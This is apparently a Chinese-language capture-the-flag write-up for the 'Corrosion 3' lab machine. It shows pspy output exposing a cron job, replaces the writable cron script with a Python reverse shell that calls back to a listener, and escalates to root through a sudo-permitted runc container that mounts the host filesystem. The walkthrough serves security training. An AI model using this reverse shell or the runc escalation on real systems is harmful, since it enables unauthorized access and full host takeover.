2026/01/11 07:58:55 CMD: UID=1000  PID=1555   | -bash 
2026/01/11 07:58:55 CMD: UID=0     PID=1552   | /usr/lib/upower/upowerd 
2026/01/11 07:58:55 CMD: UID=1000  PID=1550   | sshd: randy@pts/0    
2026/01/11 07:58:55 CMD: UID=1000  PID=1540   | /usr/libexec/gvfs-gphoto2-volume-monitor                                                              
2026/01/11 07:58:55 CMD: UID=1000  PID=1534   | /usr/libexec/gvfs-afc-volume-monitor                                                                  
2026/01/11 07:58:55 CMD: UID=1000  PID=1522   | /usr/libexec/gvfs-mtp-volume-monitor                                                                  
2026/01/11 07:58:55 CMD: UID=1000  PID=1516   | /usr/libexec/goa-identity-service                                                                     
2026/01/11 07:58:55 CMD: UID=1000  PID=1478   | /usr/libexec/goa-daemon 
2026/01/11 07:58:55 CMD: UID=1000  PID=1474   | /usr/libexec/gvfs-goa-volume-monitor                                                                  
2026/01/11 07:58:55 CMD: UID=0     PID=1433   | /usr/lib/udisks2/udisksd 
2026/01/11 07:58:55 CMD: UID=1000  PID=1429   | /usr/libexec/gvfs-udisks2-volume-monitor                                                              
2026/01/11 07:58:55 CMD: UID=1000  PID=1425   | /usr/libexec/gvfsd-fuse /run/user/1000/gvfs -f -o big_writes                                          
2026/01/11 07:58:55 CMD: UID=1000  PID=1420   | /usr/libexec/gvfsd 
2026/01/11 07:58:55 CMD: UID=111   PID=1411   | /usr/libexec/rtkit-daemon 
2026/01/11 07:58:55 CMD: UID=1000  PID=1410   | /usr/bin/dbus-daemon --session --address=systemd: --nofork --nopidfile --systemd-activation --syslog-only                                                                        
2026/01/11 07:58:55 CMD: UID=1000  PID=1388   | /usr/libexec/tracker-miner-fs                                                                         
2026/01/11 07:58:55 CMD: UID=1000  PID=1386   | /usr/bin/pulseaudio --daemonize=no --log-target=journal                                               
2026/01/11 07:58:55 CMD: UID=1000  PID=1381   | (sd-pam) 
2026/01/11 07:58:55 CMD: UID=1000  PID=1380   | /lib/systemd/systemd --user                                                                           
2026/01/11 07:58:55 CMD: UID=0     PID=1376   | sshd: randy [priv]   
2026/01/11 07:58:55 CMD: UID=33    PID=1288   | /usr/sbin/apache2 -k start 
2026/01/11 07:58:55 CMD: UID=33    PID=1270   | /usr/sbin/apache2 -k start 
2026/01/11 07:58:55 CMD: UID=33    PID=1269   | /usr/sbin/apache2 -k start 
2026/01/11 07:58:55 CMD: UID=33    PID=1267   | /usr/sbin/apache2 -k start 
2026/01/11 07:58:55 CMD: UID=33    PID=1265   | /usr/sbin/apache2 -k start 
2026/01/11 07:58:55 CMD: UID=33    PID=1257   | /usr/sbin/apache2 -k start 
2026/01/11 07:58:55 CMD: UID=33    PID=1256   | /usr/sbin/apache2 -k start 
2026/01/11 07:58:55 CMD: UID=33    PID=1255   | /usr/sbin/apache2 -k start 
2026/01/11 07:58:55 CMD: UID=33    PID=1232   | /usr/sbin/apache2 -k start 
2026/01/11 07:58:55 CMD: UID=33    PID=1230   | /usr/sbin/apache2 -k start 
2026/01/11 07:58:55 CMD: UID=116   PID=884    | /usr/sbin/kerneloops 
2026/01/11 07:58:55 CMD: UID=116   PID=879    | /usr/sbin/kerneloops --test                                                                           
2026/01/11 07:58:55 CMD: UID=120   PID=873    | /usr/bin/whoopsie -f 
2026/01/11 07:58:55 CMD: UID=0     PID=872    | /usr/sbin/knockd -i enp0s17                                                                           
2026/01/11 07:58:55 CMD: UID=0     PID=835    | /sbin/agetty -o -p -- \u --noclear tty1 linux                                                         
2026/01/11 07:58:55 CMD: UID=33    PID=824    | php-fpm: pool www                                                                                     
2026/01/11 07:58:55 CMD: UID=33    PID=823    | php-fpm: pool www                                                                                     
2026/01/11 07:58:55 CMD: UID=0     PID=817    | /usr/sbin/apache2 -k start 
2026/01/11 07:58:55 CMD: UID=0     PID=814    | sshd: /usr/sbin/sshd -D [listener] 0 of 10-100 startups                                               
2026/01/11 07:58:55 CMD: UID=0     PID=811    | /usr/bin/python3 /usr/share/unattended-upgrades/unattended-upgrade-shutdown --wait-for-signal         
2026/01/11 07:58:55 CMD: UID=0     PID=798    | php-fpm: master process (/etc/php/7.4/fpm/php-fpm.conf)                                               
2026/01/11 07:58:55 CMD: UID=0     PID=790    | /usr/sbin/cups-browsed 
2026/01/11 07:58:55 CMD: UID=121   PID=786    | /usr/libexec/colord 
2026/01/11 07:58:55 CMD: UID=0     PID=773    | /usr/sbin/ModemManager --filter-policy=strict                                                         
2026/01/11 07:58:55 CMD: UID=0     PID=762    | bpfilter_umh 
2026/01/11 07:58:55 CMD: UID=115   PID=656    | avahi-daemon: chroot helper                                                                           
2026/01/11 07:58:55 CMD: UID=0     PID=640    | /sbin/wpa_supplicant -u -s -O /run/wpa_supplicant                                                     
2026/01/11 07:58:55 CMD: UID=0     PID=638    | /lib/systemd/systemd-logind                                                                           
2026/01/11 07:58:55 CMD: UID=0     PID=637    | /usr/lib/snapd/snapd 
2026/01/11 07:58:55 CMD: UID=104   PID=636    | /usr/sbin/rsyslogd -n -iNONE                                                                          
2026/01/11 07:58:55 CMD: UID=0     PID=634    | /usr/lib/policykit-1/polkitd --no-debug                                                               
2026/01/11 07:58:55 CMD: UID=0     PID=626    | /usr/bin/python3 /usr/bin/networkd-dispatcher --run-startup-triggers                                  
2026/01/11 07:58:55 CMD: UID=0     PID=617    | /usr/sbin/NetworkManager --no-daemon                                                                  
2026/01/11 07:58:55 CMD: UID=103   PID=616    | /usr/bin/dbus-daemon --system --address=systemd: --nofork --nopidfile --systemd-activation --syslog-only                                                                         
2026/01/11 07:58:55 CMD: UID=0     PID=615    | /usr/sbin/cupsd -l 
2026/01/11 07:58:55 CMD: UID=0     PID=614    | /usr/sbin/cron -f 
2026/01/11 07:58:55 CMD: UID=115   PID=613    | avahi-daemon: running [corrosion.local]                                                               
2026/01/11 07:58:55 CMD: UID=0     PID=609    | /usr/sbin/acpid 
2026/01/11 07:58:55 CMD: UID=102   PID=579    | /lib/systemd/systemd-timesyncd                                                                        
2026/01/11 07:58:55 CMD: UID=101   PID=577    | /lib/systemd/systemd-resolved                                                                         
2026/01/11 07:58:55 CMD: UID=0     PID=329    | /lib/systemd/systemd-udevd 
2026/01/11 07:58:55 CMD: UID=0     PID=305    | /lib/systemd/systemd-journald                                                                         
2026/01/11 07:58:55 CMD: UID=0     PID=1      | /sbin/init splash 
2026/01/11 08:00:01 CMD: UID=1001  PID=1717   | /usr/bin/python3 /opt/simpleurlencode.py                                                              
2026/01/11 08:00:01 CMD: UID=1001  PID=1716   | /bin/sh -c     /opt/simpleurlencode.py                                                                
2026/01/11 08:00:01 CMD: UID=0     PID=1715   | /usr/sbin/CRON -f

分析

你最后看到的三行是：

2026/01/11 08:00:01 CMD: UID=1001 PID=1717 | /usr/bin/python3 /opt/simpleurlencode.py 2026/01/11 08:00:01 CMD: UID=1001 PID=1716 | /bin/sh -c /opt/simpleurlencode.py 2026/01/11 08:00:01 CMD: UID=0 PID=1715 | /usr/sbin/CRON -f

一.这三行分别意味着什么？

🔴 第 1 行：root 的 cron 在运行

UID=0 | /usr/sbin/CRON -f

说明：

这是 系统级 cron（root）
时间点是 08:00:01
cron 在这一刻触发了一个定时任务

📌 这是“起点”

🟠 第 2 行：cron 通过 shell 调用了脚本

UID=1001 | /bin/sh -c /opt/simpleurlencode.py

说明：

cron 并不是直接运行 Python
而是通过 /bin/sh -c
这通常来自 crontab 中的写法，例如：

* * * * * /opt/simpleurlencode.py

📌 shell 是中间层

🟢 第 3 行：Python 真正执行的程序

UID=1001 | /usr/bin/python3 /opt/simpleurlencode.py

这是最重要的一行：

实际执行的文件是：

/opt/simpleurlencode.py

运行身份不是 root
而是：

UID=1001

二、UID=1001 是谁？（结合你之前的信息）

你之前的 /etc/passwd 中有：

bob:x:1001:1001::/home/bob:/bin/sh

👉 所以可以确定：

项目	结论
UID 1001	用户 bob
执行脚本的身份	bob
触发者	root cron

三、这说明了一个非常关键的系统设计点

⚠️ root 的 cron 在调用一个不以 root 身份运行的脚本

这在审计中会被描述为：

特权调度 + 非特权执行模型

它本身不一定是漏洞，但一定是：

📌 高价值审计点
📌 pspy 的核心用途之一
📌 报告非常喜欢的“发现点”

四、为什么 pspy 能看到，而你“平时看不到”？

因为：

你不能：

crontab -l -u root

你也不一定能读 /etc/crontab
但 pspy 不读配置
它只看“发生了什么”

👉 所以它直接把“事实”给你了

流程

查看用户文件知道UID为1001的用户是bob

查看python文件，当前用户有写入权限，可以利用该文件获取bob用户的权限

randy@corrosion:/tmp$ cat /opt/simpleurlencode.py 
#!/usr/bin/python3 

import urllib.parse

string = input("Url Encode String: ")
input = urllib.parse.quote(string)
print("Encoded String: " + input)

准备一个自定义的python文件写入反弹shell木马并替换原来的文件，注意要指定第一行的环境变量信息，不然python代码不生效

#!/usr/bin/python3
import socket,subprocess,os
 
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect(("192.168.0.106",7777))
os.dup2(s.fileno(),0)
os.dup2(s.fileno(),1)
os.dup2(s.fileno(),2)
import pty
 
pty.spawn("/bin/bash")

randy@corrosion:/tmp$ cp ./simpleurlencode.py /opt/simpleurlencode.py 
randy@corrosion:/tmp$

┌──(kali㉿kali)-[~/Desktop/tools/pspy]
└─$ nc -lvvp 7777
listening on [any] 7777 ...
192.168.0.107: inverse host lookup failed: Unknown host
connect to [192.168.0.106] from (UNKNOWN) [192.168.0.107] 40190
bob@corrosion:~$ ls
ls
user.txt
bob@corrosion:~$ cat user
cat user.txt 
d3a6cef5b73fa1fb233ed6a0e3b9de01

提权-ROOT

分析

sudo -l

👉 列出“当前用户被允许用 sudo 执行的命令”

查看sudo权限，发现可以无密码执行runc工具，可以利用它提权root

bob@corrosion:~$ sudo -l
sudo -l
Matching Defaults entries for bob on corrosion:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User bob may run the following commands on corrosion:
    (root) NOPASSWD: /usr/sbin/runc

RunC 是一个轻量级的工具，它是用来运行容器的。

runc 是 容器运行时
👉 可以直接启动一个“带 root 权限的容器”，并把宿主机根目录挂进去

流程

升级终端

问题：这里使用的是反弹shell，获取的shell用不了nano命令。

需要升级下shell，设置环境变量终端类型为xterm

#Ctrl+Z暂停会话任务
stty raw -echo;fg #将终端设置为原始模式并禁用回显，调用后台任务执行
reset
xterm
export TERM=xterm

升级之后的shell就用的习惯了

✅ Step 1：准备 rootfs 目录

cd /tmp/runc
mkdir -p rootfs
sudo /usr/sbin/runc spec

✅ Step 2：修改 config.json（关键）

① 改 root.path（⚠️不是 `/`）

"root": {
    "path": "rootfs",
    "readonly": false
}

② 在 mounts 最前面加一个 bind mount（非常关键）

在 "mounts": [ 里 第一项加上👇：

{
    "destination": "/",
    "type": "bind",
    "source": "/",
    "options": [
        "rbind",
        "rw"
    ]
},

⚠️ 一定要放在 /proc 之前

✅ Step 3：你的 mounts 最终结构应该是这样（精简版）

"mounts": [
    {
        "destination": "/",
        "type": "bind",
        "source": "/",
        "options": ["rbind","rw"]
    },
    {
        "destination": "/proc",
        "type": "proc",
        "source": "proc"
    },
    {
        "destination": "/dev",
        "type": "tmpfs",
        "source": "tmpfs"
    }
]

（其他 dev/pts、shm 可以保留，不影响）

✅ Step 4：启动容器（这次一定能成）

sudo /usr/sbin/runc run rootme

Flag

# cat root.txt
18e8141ab1333a87c35e1fad5b394d66

This rendering was automatically generated by Frosti Feed and may have formatting issues. For the best experience, please visit: https://heathc1iff-sec.github.io/blog/hmvmachines/corrosion3/